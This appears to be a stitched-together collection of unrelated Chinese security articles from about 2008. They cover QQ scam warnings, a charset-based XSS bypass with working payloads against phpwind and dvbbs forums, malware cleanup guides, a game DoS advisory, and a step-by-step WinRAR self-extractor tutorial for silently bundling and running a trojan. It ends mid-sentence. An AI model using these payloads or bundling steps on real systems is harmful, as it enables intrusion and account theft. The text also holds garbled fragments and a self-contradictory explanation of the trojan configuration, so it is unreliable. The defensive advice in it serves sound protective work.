      随着网民参与互联网活动的日益频繁，网络上的诈骗案件数量也呈上升的趋势，并且花样繁多、防不胜防。欺诈者利用不存在的高额现金或丰厚奖品诱骗用户汇款；冒充腾讯公司举办虚假的“免费送Q币，送五位QQ靓号”活动骗取高额通信费…
      动物家园反病毒斗士团队根据近年来监测发现的欺诈消息和QQ用户举报的网络骗术案例，总结了常见网络骗术防御要点如下。请广大用户在上网时留意，谨防诈骗！
■  勿轻信“中奖”消息——利用“中奖”骗取汇款是最常用的网络骗术之一

诈骗流程：发送大量的中奖通知（提供兑奖联络方式）——（如网友与之联系）诈骗者以个税等各类名义要求汇款（提供银行帐号）——收到汇款（诈骗成功）——拖延时间要求再次汇款——诈骗者销声匿迹


案例说明：


    动物家园反病毒斗士团队经常接到用户举报反馈，有不法分子假冒“腾讯公司”名义，通过QQ聊天消息发送虚假中奖信息，有文字消息形式，也有图片消息形式。大意为用户被系统抽取为某活动中奖幸运用户，想要领奖需要填写个人详细资料及支付相关费用，要求用户按所提示联系方式进行汇款。



图片消息形式的案例截图如下：
1.jpg (90.01 KB)
2008-6-27 13:11

文字消息形式的案例截图如下：

2.jpg (82.32 KB)
2008-6-27 13:11

如何识别此骗术：

      关键识别方法：腾讯不会以QQ聊天消息、QQ空间回帖、游戏大厅消息、聊天室消息通知用户中奖。 （腾讯官方通知中奖的方式：官方电话通知、官方邮件通知、QQ上系统消息通知等正式形式。）

■  不轻易拨打12590的电话号码——拨打可能会被扣除高额通信费

拨打12590电话通常需要支付高额通信费用，目前，不法分子常利用的诈骗手段是：花言巧语诱使用户拨打12590电话激活某项服务或听取网友留言，从而榨取用户高额通信费用。


案例说明 ：

      腾讯公司近期接到用户投诉，反映在QQ上接到一些非法广告信息，上面会提示用户拨打某个电话，用户拨打这些号码后被扣取一定的话费。

行骗伎俩 ：

      骗取用户拨打的是12590号码，例如12590865878


3.jpg (64.46 KB)
2008-6-26 19:28


详细内容：

1、“新年快乐~ 祝你在新的一年里：ｌ帆风顺、２龙腾飞、５福临门、幸福长９！我刚刚给你点了一曲好听的歌放在我的个人空间里,你用手机播前面四句话中的四个数字加上０８６５８７８　就可以听了，后面还有我的留言呢。^_^!记得去听，别浪费我一番心意哦! 听完了也点一曲给我听啊! 呵呵~我下了，拜拜~！”

2、有一段时间没?你了，过得怎么样？最近比较少上Q. 因此特意 ?你点了一首超好听的歌，你用手机拨：ｌ２５加上９０６２０３３８就可以听了。 后面还有我的留言录音。^_^!记得去听，别辜负我一番心意哦! 听完了也点首给我听啊! 呵呵我下了。88

3、最近很忙，所以较少上QQ. 因此特意给你点了一首超好听的歌，还有我的语音留言. 你用手机拨打下面的数字听听看，记得拨打，别浪费我一番心意，否则我恨你!^_^ ┃2590658880

4、这个新年，我特意给你点了一首好听的新歌,带上我的情谊和祝福...... 你用首机拨： 125加上905733205 就可以听了。后面还有我的留言录音。^_^! 记得去听，别浪费我一番心意哦! 听完了也点首给我听啊! 呵呵~ 我下了。88


■  警惕冒充腾讯客服的0898电话号码——腾讯客服电话（0755-83765566）

根据QQ公司了解到，有有关诈骗案例中，传播者多集中在海南地区，传播者诈骗使用的所谓“客服电话”常为海南区号0898，敬请留意。



案例说明：

1.jpg (90.01 KB)
2008-6-27 13:12

2.jpg (82.32 KB)
2008-6-27 13:12


■  警惕冒充腾讯官方网站的网址——在虚假网站中输入帐号密码会被盗用

不法分子通过制作假冒的腾讯官方网站（如腾讯拍拍网、财付通网站），引诱用户输入QQ或财付通帐号，获取用户帐号后，会立即转移帐户中的财产。如果您的网络帐户中存在财产或重要隐私信息，请在输入帐号密码前注意确认所在网站是否为官方网站。



案例说明：

在这种骗术中，不法分子惯用的手段通常为：

步骤1：首先制作一个和腾讯官方网站（如拍拍网）看起来“一模一样”的诈骗网站。如果不仔细检查，假冒网站的地址和页面风格不会引起人们的警惕。 点击
http://service.qq.com/info/5141 了解如何识别腾讯官方网站
4.jpg (31.34 KB)
2008-6-26 19:33

步骤2：想方设法和用户交流，传播推广其精心制作的“假冒腾讯网站”；
5.jpg (31.11 KB)
2008-6-26 19:33

步骤3：网站上引诱用户在假冒网站上登录输入密码，当用户输入帐号密码后，帐户中有价值的财产就会被骗子迅速转移。
6.jpg (58.52 KB)
2008-6-26 19:33

请广大用户增强防范意识，仔细分辨真伪，尽可能不点击陌生网友发来的安全性未知的网站地址，在输入QQ帐号和密码前要仔细检查网址是否属于腾讯网站官方所有。


■  腾讯公司不开展“免费送Q币”活动

腾讯公司不会开展（也不会委托第三方开展）“免费送Q币”活动。请勿相信不良网站上的“免费送Q币”的虚假宣传，此类内容或链接常被别有用心者利用进行诈骗或发布商业广告。
此外，请网友不要购买非腾讯官方网站出售的廉价Q币，廉价Q币大多是通过“盗号”等非法渠道获得的，购买会存在交易风险。



案例说明：


在这种骗术中，诈骗者惯用手段主要有三个步骤。

步骤1 ：在QQ或某些网站上传播大量虚假的QQ靓号（或Q币）赠送活动消息，吸引用户访问“活动”网站

(以下是热心用户举报的恶意消息内容）

“我刚注册了个新 QQ ： 990014- 太高兴了，终于有个 6 位的 QQ 号码了，今天在 http://%70ro.163.com//event.ng/Type=&Redirect=http://%73%6F%6E%67qq10.cn/qq10.htm- 这个网站免费申请的 6 位 QQ 号，大家都赶快去看看吧，哈哈 - 下次有好的东西千万不要忘记我哦 -D ”

“奥运竞猜，免费答题送 Q 币等的活动 , 我刚去了，得了 30QB, 大家也去试试吧 , 挺简单的 !~ 地址是 www.sohu.com%2E00%37mm%2e%43n ”

步骤2：以QQ靓号（或Q币）为诱饵，使用花言巧语诱导访问者相信其举办的“活动”可靠

8.jpg (62.69 KB)
2008-6-26 19:42


步骤3：如果访问者参加领取QQ靓号（或“答题”等活动）后，诈骗者引诱用户发送手机短信骗取话费


9.jpg (71.6 KB)
2008-6-26 19:42

请注意，这里的 短信资费是2元/条 ，这才是诈骗者骗取钱财的最终目的。当然，即使访问者立即发送短信“激活”所谓的靓号，也无法收到QQ靓号和任何答复，手机话费就这样轻易落入了诈骗者的口袋里.

10.jpg (40.12 KB)
2008-6-26 19:42

■  腾讯公司不开展“免费送5、,,,号码”活动

腾讯公司不会开展（也不会委托第三方开展）“免费送5、,,,号码”活动。常见的骗术以提供“免费5、,,,号码”做幌子，当用户选择一个QQ号码时，会要求用户使用手机激活QQ号码以骗取高额电话费。
提示：免费获取QQ帐号的腾讯官方网站地址为：
http://freeqqm.qq.com/

7.jpg (61.6 KB)
2008-6-26 19:42


骗术统一识别方法：

1、腾讯不会向中奖用户索取任何费用。（如：手续费、运输费、邮寄费、税收等）

2、腾讯不会以QQ聊天消息、QQ空间回帖、游戏大厅消息、聊天室消息通知用户中奖。（腾讯官方通 知中奖的方式：官方电话通知、官方邮件通知、QQ上系统消息通知等正式形式。）

3、QQ邮箱官方邮件必须有“蓝色小喇叭图标”+“蓝色标题字”。

4、腾讯官方网站域名后一定紧跟着‘ / ’，例如 http://im.
qq.com/
cgi-bin/face 是真的，  http://www.
qq.com
. qqx.cn/index.html 是假冒网站。

5、腾讯客服电话为：0755-83765566。

6、假冒 “腾讯客服”、“10000号”的骗子只是修改QQ用户名，可查看QQ帐号不是10000号。

7、假冒系统消息一般是假冒网站弹出的，不是QQ弹出的，可多次打开网站辨别。

8、腾讯公司所有的中奖活动都会在我们的官方主页上进行公布。 您可以在腾讯客服活动大厅（ http://service.qq.com/play.shtml
） 查询腾讯官方的活动。需特别注意：欺诈者也可能借用相同的活动名称，链接到假冒网站诈骗，但通过前面辨别方法可以区分。

9、接到陌生号码来电时，您要提高警惕，即便是熟人的电话，如果涉及汇款等敏感问题，千万不要轻信，最好的方式是回拨核实。对方如果是网络电话，是无法接听的！

在一般的web程序里，显示数据给浏览器的时候都会指定一个字符集，在国内平时我们用到的字符集有utf-8，GBK，gb2312等等，字符集指示了浏览器该如何对待返回的数据。其中gb2312和GBK字符集使用得非常广泛，但是经证明，IE在处理这些宽字符集的时候存在问题，导致可能程序的一些安全规则被Bypass掉，引发严重的跨站脚本安全漏洞。在IE里，如果它遇到一个字符，它是指定字符集里的第一位的时候，就会认为其后续字符和当前字符构成一个合法的字符，这样它在解析包括html标签，处理javascript，Css时都会做如此考虑，测试版本为ie6和ie7。

1 Bypass某些js的检查规则

HTML>
〈HEAD>
〈TITLE>80sec test〈/TITLE>
〈meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
〈/HEAD>
〈BODY>
〈script>
window.onerror=function(){
alert('Vul');
return true;
}
〈/script>
〈script>x='〈?php echo chr(0xC1);?>';y='[User_IN_PUT]‘;〈/script>
〈/BODY>
〈/HTML>



这里即使是过滤了〈>’\等字符一样可以利用非法字符集序列来实现\的作用，因为它会把原来存在的’给结合掉，然后前面的’找不到闭合，后面[User_IN_PUT]就可以用来执行js代码了。

2 Bypass某些属性的检查规则

为了避免直接使用html导致出现漏洞，一些论坛和程序使用了UBB标签，但是在gbk等多字节编码下，一样容易出现问题，以最容易出现问题的一个UBB标签为例子：

color=xyz〈?php echo chr(0xC1);?>][/color][color=abc onmouseover=alert
(/xss/) s=〈?php echo chr(0xC1);?>]exploited[/color]

0xC1是一个gb2312的第一个字节，上面结果将会转化为：

font color="xyz?>〈/font>〈font color="abc onmouseover=alert(/xss/) s=?>
exploited〈/font>


其中的

alert(/xss/)



将会做一个事件执行，所以即使UBB标签也变得不安全，能饶过”的保护。许多论坛都没有注意这点，phpwind，动网等论坛就容易受到这种攻击。而Discuz通过在转换结果之后附加一个空格，修补了这一安全问题。这里使用到ubb标签其实有一个很有意思的tips在里面，因为有的数据库会抛弃与指定字符集不匹配的字符，所以必须借助后面的]等字符来形成一个有效的汉字才能存储到数据库里，当然像ACCESS这种就不会有问题了，另外一些语言在处理字符串的时候会强制字符串的字符集类型，不合法的字符会导致转码的失败或者遭到抛弃，所以也不能利用这种类型的攻击。

3 几个小例子

Phpwind论坛charset跨站脚本漏洞

 

[email=xxxx羃[/email][email=xxxx onmouseover=alert() s=羃]Fuck Me[/email]
[font=宋体;0xc1]xxx[/font]xx 

羃是一个特殊的十六进制编码和后面的]结合出来的字符，第一个种方法可以直接复制的：)

0xc1表示一个十六进制的字符编码

同样在dvbbs论坛也很容易产生一个xss代码如下

                            xxxxxxxxxxx〈/font>
均在新版和老版测试通过。4 关于修复对于程序设计者，由于UTF-8字符集的可靠性，不存在这个安全漏洞，所以大家在设计站点的时候可以考虑使用UTF-8字符集。对于广大开发者，可以牢记最小输入等于最大安全的原则，在匹配正则的时候限制输入的字符的范围，尽量匹配ascii字符，如果必须使用中文，可以考虑类似于discuz的在中文后面添加空格修复该问题。对于广大用户，这个漏洞由于浏览器处理页面字符的不同，可以考虑使用如Firefox浏览器，可以避免一部分这样的问题。

最近有一些病毒通过internat.exe和ctfmon.exe文件来隐藏自己，比如：Win32.Lydra.a木马和感染虫下载器45056    Win32.Troj.Downloader.c.45056等。

　　那么internat.exe和ctfmon.exe文件到底是不是病毒文件呢？部落很肯定地告诉大家，他们不是病毒文件，他们是Windows的输入法相关程序。

　　internat.exe是微软Windows多语言输入程序，而ctfmon.exe是Microsoft Office产品套装的一部分。如果我们终止了他们的运行，可能会造成输入法出错的问题，比如在任务栏中无法显示语言栏或者无法切换输入法等问题。

　　那么我们怎么分辨internat.exe和ctfmon.exe文件到底感没感染病毒呢？

　　首先我们进入：“C:\Windows\system32\” 文件夹，找到文件internat.exe和ctfmon.exe，察看文件大小，internat.exe的正常大小应为20.7K，ctfmon.exe的正常大小应为15K，如果你发现这两个文件的大小比较离谱，那么就很有可能已经种了病毒了。

　　还有就是看文件图标，internat.exe和ctfmon.exe得正常图标如下图所示：



　　如果你发现文件的图标不是这样的，那么很有可能你已经中毒了。

　　中毒后的解决办法

　　将杀毒软件升级到最近版本进行查杀，如果查杀完毕后发现输入法无法正常使用的情况，请下载附件中的文件，将其解压后复制到“C:\Windows\system32\” 文件夹即可解决。

　　internat.exe和ctfmon.exe的原始文件

雇佣兵之秘密战争是由Wings Simulations开发的战略5游戏。游戏处理畸形用户请求时存在漏洞，每个发给游戏的UDP报文都包含有各种数据块，其中0x80类型报文可以强制服务器执行该数据库中所指定的从0到32位数（因此最大为0xffffffff）的循环。

发布日期：2008-07-01

更新日期：2008-07-02

受影响系统：

Wings Simulations SOLDNER - Secret Wars <= 33724

描述：

----------------------------------------------------------------------------

BUGTRAQ ID: 30031

雇佣兵之秘密战争是由Wings Simulations开发的战略5游戏。

游戏处理畸形用户请求时存在漏洞，每个发给游戏的UDP报文都包含有各种数据块，其中0x80类型报文可以强制服务器执行该数据库中所指定的从0到32位数（因此最大为0xffffffff）的循环。游戏所支持的最大报文大小为1400字节，因此最大为233块的该类型报文会导致服务器僵死。

<*来源：Luigi Auriemma （aluigi@pivx.com）

链接：http://secunia.com/advisories/30880/

http://marc.info/?l=bugtraq&m=121492188218160&w=2

*>

建议：

----------------------------------------------------------------------------

厂商补丁：

Wings Simulations

-----------------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.secretwars.net/

很多网游玩家的帐号曾经被盗过，不玩儿游戏的人可能无法理喻游戏玩家，网游帐号被盗，有家里失窃基本是一样的，帐号就是家门钥匙，一旦“钥匙”被盗，窃贼就可以洗劫你的财产。游戏玩家的财产有哪些呢？装备、好友、游戏财富、游戏里的虚拟地位，一旦你失去这些，在网游中就变得一文不名，游戏世界比现实更加残酷，一文不名，可能处处受人欺压哦。 以下讲述可能导致你游戏帐号丢失的几个情景故事，没准儿这事儿曾经或即将在你身上发生。
情景1：看游戏秘笈中木马
玩家小花旦在游戏里想合成几件极品装备，缺钱缺经验，得到网上找找看别人有没有好的点子。结果无意中看到一贴“合成黄金装备秘诀，别被GM看见”，受此标题吸引，小花旦点击浏览。页面几个跳转之后，也没发现自己需要的内容，系统慢慢变卡。游戏速度变慢，下线。重新登录后，发现自己的帐号已经被洗干净了。
分析：
小花旦的电脑极可能没有修补浏览器漏洞、Flash Player漏洞和RealPlay漏洞，导致浏览网页下载带毒网页木马，木马利用漏洞入侵完成游戏盗号。小花旦感觉网速变慢时，可能是木马下载器正在进行下载动作或者和向远程服务器上传盗窃的信息。
威胁程度：★★★★☆
处方：打补丁，没二话。什么？不会打补丁？去用金山清理专家帮你打吧，你要不愿意，就只好等着再次被盗号。


利用安全工具为系统打补丁【编辑点评：喜欢玩游戏的朋友，总是想找找秘笈、修改器什么的，现在看来这个“捷径”已经被木马盯上了。】
情景2：用游戏外挂中木马
懒人小毒超喜欢挂机，玩游戏必要使外挂，名言是“没外挂的游戏是不玩儿的”。这不，剑侠世界刚上线没多久，传说出了脱机外挂，可同时跑50个号。小毒就按网上有人提供的地址下了个所谓的“脱机挂”，执行后，还象模象样的，就是外挂不能使，输入多次帐号还是没用。小毒有事下线，等他再上时，帐号已经被人洗了。
分析：
木马作者会利用游戏玩家对外挂或其它辅助软件的期待，精心设计骗局，有的所谓外挂只有一个UI界面，只要你输入帐号密码，这些东西就已经拱手送人了。
威胁程度：★★★★★
处方：这类程序万万不可在自己要登录游戏的电脑上执行，如果要尝试，建议安装一个沙箱“sandboxie"，安装后，想启动这些不太可靠的程序时，右键选中，点击在沙箱中运行。然后观察程序执行后的变化，比如会不会在system32下生成不相关的程序，会不会感染文件等。
同时，测试时，千万别输入真实的游戏帐号密码。沙箱里运行程序，虽说不会破坏系统，但一样可以盗号的。


沙盘【编辑点评：沙箱是一个好选择，就是需要一些专业性。】
情景3：听信谣言捡便宜，同时丢掉网银帐号和游戏帐号
玩儿游戏的人估计见过，常有人会和你套近乎，然后说某天发现游戏一充值BUG，照此操作就能白捡**好处若干。
分析：
这是典型的网络欺诈，如果你信以为真，照葫芦画瓢，不去检查页面是不是官方的充值页面。就会同时把网银帐号和游戏帐号送人。
威胁程度：★★★★★
处方：记住，天上不会掉馅饼，大大小小都不会。只认准官方充值页面，并且厂商为了安全，所有充值页面都会是https加密的，浏览器的状态栏会有一把小锁。尽量使用网络银行的专业版，有证书的保护，会安全很多。
注意看下面这个例子：


网银【编辑点评：最好的解决办法——便宜莫贪！】
情景4：朋友被盗受连累
御人和天使在游戏里是铁哥们，一天，“天使”突然发消息说，“借你的号用用”，铁哥们当然就借了，然后，等御人再上时，发现被洗号。打电话过去一问，原来那哥们也被偷了，看这对难兄难弟够惨的吧。
分析：
盗号者得到一个号之后，迅速扩大战果常用的作法之一就是骗你的好友。
威胁程度：★★★★★
处方：
注意，不要轻易将帐号借人，QQ、游戏里聊天都不可靠，还是事先电话沟通一下的好，即使换号，也要注意及时修改密码。
【编辑点评：为了安全，多用电话与朋友沟通吧！】

rose.exe病毒清除详细操作指南

　　杀毒方式：目前经测试，不论是哪个杀毒软件，不论你将病毒库升级到最新的哪个时候，它们暂时都不具备查杀该病毒的能力，即便是在你所使用的杀毒软件是正版的情况下。个人估计杀毒软件公司的员工此时正在抓紧时间研究如何查杀中。

　　我也是中了此毒，被折腾得够呛，也重装了电脑，花了点时间从网上去学习，才有此切身经验，现在根据以往别人提供的方法，再结合自己的经验，希望对各位电脑中毒的同学有所帮助，也希望能引起其他没中毒的同学的重视。

　　rose.exe病毒具体方法如下：

　　1、按Ctrl+Alt+Delete调出任务管理器，在进程页面中结束掉所有名称为Rose.exe的进程（建议在后面的操作中反复此操作，以确保病毒文件不会反复发作）。

　　2、在开始－－运行中输入“regedit”（XP系统）打开注册表，点“编辑”——“查找”，在弹出的对话框中输入“rose.exe”，找到后将整个shell子键删除，然后继续按F3查找下一个，继续删除查找到有关的键值，直到显示为“注册表搜索完毕”为止。

　　3、在我的电脑－工具－文件夹选项－查看－显示所有文件和文件夹，把“隐藏受保护的系统文件”的勾去掉。

　　4、对每个盘符点右键－打开进入（切记不能双击），删掉所有的rose.exe和autorun.inf文件。如果删除时候提示不能删除，可将这两个文件的属性由“只读”改为“存档。若还不能删除，则重启电脑，在自检时按F8进入到安全模式下去删除。

一、WinRar挂马
　　1、实例演示
　　在我们的印象中挂马一般都是在网页中嵌入恶意代码，浏览者通过浏览器浏览是然后中招。WinRar也可以挂马，我们看攻击者是怎么做的?
　　第一步：新建一个文本文件，比如lw.txt。在该文件上点击右键选择“添加到压缩文件”，打开如图1所示的窗口，在“压缩选项”中勾选“创建自解压格式压缩文件”选项。
　　
　　                                                  图1
　　第二步：点击图1中的“高级”选项卡，在打开窗口中点击“自解压选项”按钮，在“高级自解压选项”窗口中点击“文本和图标”选项卡如图2。由于“自解压文件窗口中显示的文本”支持html脚本，因此我们就可以在其下的文本框中输入跨站代码进行挂马。
　　
　　                                          图2
　　第三步：在文本框中输入如图2代码点击“确定”按钮即可。
　　提示：第一行弹出一个对话框(实际攻击中会省略，我们因为是演示才加了)，第二行是打开IT专家网安全子网的页面，攻击者往往会嵌入一个具有恶意代码的页面URL。
　　第四步：双击打开lw.exe文件，弹出一个对话框，确定后在WinRar中打开了相关的页面，跨站成功如图3。
　　
　　                                                          图3
　　小结：WinRar挂马的安全威胁比较大，因为它是我们常用的解压工具，稍微不留意就会中招。同时它支持的脚本比较多，攻击者可以利用其他更隐蔽的挂马脚本。

二、WinRar绑马
　　WinRar绑马和上面的挂马原理差不多，都是利用了WinRar的自解压功能在其中嵌入恶意代码，让压缩包中的木马运行。
　　1、实例演示
　　第一步：准备好的木马程序和正常的程序或者图片文件，按照实例一第一步的操作把它们添加到自解压包中。根据自己的需要选择“压缩方式”，然后点击“高级”标签，选择“SFX　选项”，在“释放路径”中填入你需要解压的路径，这里填的是“%systemroot%/temp”(不包括引号)，表示解压缩到系统安装目录下的temp(临时文件)文件夹下。在“解压后运行”中输入正常的程序(记事本)，在“解压前运行”中输入你的木马程序名(测试中一个简单的对话框弹出小程序lw.exe)如图6。
　　
　　                                          图6
　　第二步：点击“模式”选项卡，在打开的窗口中勾选“全部隐藏”和“覆盖所有文件”选项如图7，以增强容错性，最后点击“确定”即可。
　　
　　                                        图7
　　第三步：双击运行该自解压程序，正常的程序notepand.exe和测试程序lw.exe依次运行，如图8。
　　
　　                                    图8
　　提示：除了上面的方法为，攻击者一般都通过脚本代码来达到在WinRar中捆绑木马达到其目的。其中关键代码如下：
      Path=%systemroot%
　　Setup=lw.exe
　　Presetup=notepad.exe
　　Silent=1
　　Overwrite=1

　　第一行是文件的解压路径，在系统根目录下;第二行是解压后自动运行lw.exe;第三行是在解压之前先运行notepad.exe，达到掩人耳目;第四行是隐藏文件，达到更隐蔽;第五行是覆盖目录下的同名文件，以容错更可靠!
预防技巧

2、防范技巧
　　(1).上面防挂马的第一条相同，就是用WinRar打开自解压包
　　(2).在遇到后缀为exe的自解压包前一定先用杀毒软件对其进行查毒，确定无毒后再用WinRar打开。
　　(3).通过一些诸如“捆绑分离器”的软件进行压缩包的分离，把正常的程序和木马分离出来。
　　(1).不要直接双击打开后缀为exe的压缩文件，安全的做法是先打开WinRar，然后通过它打开该压缩文件。如果压缩包中加入了恶意脚本就会在其右边的窗格中显示出来。当然也可以点击任务栏中的“信息”按钮，在打开的窗口中点击“注释”选项卡，所有的脚本都会显示出来如图4。
　　
　　                                            图4
　　(2).安装防火墙，因为WinRar自解压文件中被嵌入了挂马代码其就会进行网络连接，这是防火墙就会弹出是否允许网络连接的对话框如图5，这就非常可疑。

根 据很多使用各种杀软的朋友反应中某些病毒后无法使用绝大多数杀毒软件，这是由于病毒利用了注册表里的“映像劫持”。简单点说，当杀毒软件a.exe 被病毒b.exe在注册表里设置了映像劫持后，每当运行a.exe就会启动b.exe。不仅仅是杀毒软件，包括Sreng、IceSword、 Regedit、MsConfig都无法正常使用。 

05-31更新了解决方法，可以比较彻底的解决这个问题（成功率在95%以上）。修复系统时请严格按照图片说明来操作，这样才能保证效果！ 
按 照提示更名后请务必将下载的文件全部解压到桌面！下载后我们会得到软件Regsitry Workshop、WSysCheck0525版（我已将其改名为l8ddp410dy.exe）以及注册表修复文件FixIFEO.reg（修复映像劫 持）和FixSafeBoot.reg(修复安全模式）。


这一步特别重要请认真操作


-K R u} t 这 一步非常重要，要尽全力找到这个7/8位字母数字随机组合命名的Dll文件。如果这个dll还加载进了Winlogon.exe那么请在该DLL上单击鼠 标右键选择【添加到Dos删除列表】，然后执行下面的第十步内容，删除顽固文件完成后进入正常系统，再从上面的第二步重新开始向下执行。
)u[lL ) @ 需 要注意的是这个dll不一定只局限于7、8位随机名的DLL，也有可能是其他文件名的DLL，这里主要是要判断陌生的dll文件，一般插入 Explorer的病毒dll包含在以下文件夹：【C:\Program Files\Common Files\Microsoft Shared\及其子文件夹】、【C:\Program Files\Internet Explorer\及其子文件夹】、【C:\WINDOWS\system32\drivers\及其子文件夹】、【临时文件夹】等...操作时需多加判 断

这一步也很重要，包括Explorer.exe以及Iexplore.exe都要终止




重启之前，有一点提示，即：请使用WSysCheck内置的文件管理器浏览各个硬盘分区，检查其根目录下是否存在Autorun.inf及陌生的.exe或.pif文件，如果存在，请务必删除。

随着病毒技术的“与时俱进”，杀毒软件技术的差异化开始越来越明显。曾经在杀毒软件的选择上抱着无所谓态度的用户开始逐渐理性，从原来以广告和知名度作为选择标准，回归到杀毒软件本质——杀毒能力的选择标准上来。

　　杀毒软件同质化论调被“磁碟机”击破

　　杀毒软件本身是一种高技术门槛的行业，近年来，随着一些辅助安全工具软件在互联网上的流行，一些不规范的软件开发者采用偷换概念的宣传手法，把本身作为安全辅助工具小软件也宣称为杀毒软件，于是出现了似乎谁都能做杀毒软件的虚假繁荣假象。事实上正规的杀毒厂商，目前国内活跃的仅剩下江民、瑞星、金山等少数几家，他们凭借在这个行业多年的积累，掌握着各有特色的核心技术，占据了多数的市场份额。此外，还有多款不同品牌的国外杀毒厂商，为了抢夺国内杀毒市场份额，开始在我国发动持久而大范围的免费战，并积极宣传同质化论调，认为杀毒软件都一个样，用付费的不如用免费的。借此分散国内厂商的用户群，在达到一定规模的数量后，再开始学习微软打击盗版，采用封号的手法，让原来的盗版使用者成为付费用户。

　　2008年3月份，一个“磁碟机”病毒的出现，让电脑用户对杀毒软件有了本质的认识。那段时间内，许多用户发现自己电脑上装的国内外知名品牌杀毒软件实时监控被关闭，杀毒软件升级、杀毒等功能失去作用，杀毒软件象被巨大的黑洞吞噬一般，对病毒无丝毫的还击能力。事后，反病毒专家分析认为，这是一个典型的驱动型病毒，病毒释放出的驱动程序卸载了杀毒软件与系统连接的钩子，使它的监控失去效力，然后，病毒屏蔽了杀毒软件的升级网站，使杀毒软件无法升级病毒库。而且病毒能够在网上通过自身的服务器升级更新，让杀毒软件特征码检测失效。“磁碟机”病毒的出现，顿时击破了杀毒软件同质化的论调，一些核心技术过硬的杀毒软件在这次事件中脱颖而出，不但未被病毒关闭监控，而且带有智能主动防御系统层层拦截了病毒的每一步动作，确保了用户的系统和数据安全。

　　病毒技术“与时俱进”

　　病毒技术发展到今天，已经与最初的病毒定义相去甚远。病毒的最初定义是“一段可以自我复制的有害代码”，而据江民反病毒中心监测结果显示，进入2008以来，大部分主流病毒技术都进入了驱动级，病毒已经不再一味逃避杀毒软件追杀，而是开始与杀毒软件争抢系统驱动的控制权，在争抢系统驱动控制权后，转而控制杀毒软件，使杀毒软件功能失效。一系列先进的隐身和破坏技术被病毒采用，如ROOTKIT技术、内核级HOOK技术、进程注入、文件加密存放等等。

　　驱动型的病毒安装运行后，会利用内核级的钩子去隐藏病毒进程、病毒文件和病毒在注册表中的启动项，防止被安全软件所查杀，而一些关键性的数据信息在木马驱动程序文件体内是加密存放的，一但用户计算机系统感染该病毒，则很难清除干净。

　　越来越多的病毒开始刻意隐藏自身的行踪，在电脑用户毫无知觉的情况下完成破坏过程。江民反病毒专家发现，现在的病毒作者在编写病毒时更加注重自身的隐蔽。病毒作者主要采用三大隐身术，通过RootKit技术隐藏病毒进程、病毒文件、隐藏数据传输端口以及注册表内键值;通过篡改注册表相关键值屏蔽显示隐藏文件的功能;使用IEFO重定向劫持技术禁止杀毒软件运行。

　　其中，RootKit 技术是今年病毒普遍使用的技术，最早用于UNIX平台上，用于替换一些重要的系统文件，以来迷惑管理员对系统信息的察看。现在该技术现在已经移植到Windows平台上，并已经广泛使用，具有隐藏进程、隐藏文件、隐藏端口等功能。

　　面对病毒技术的飞速发展，许多杀毒软件开始跟不上病毒技术，在核心技术上迟迟未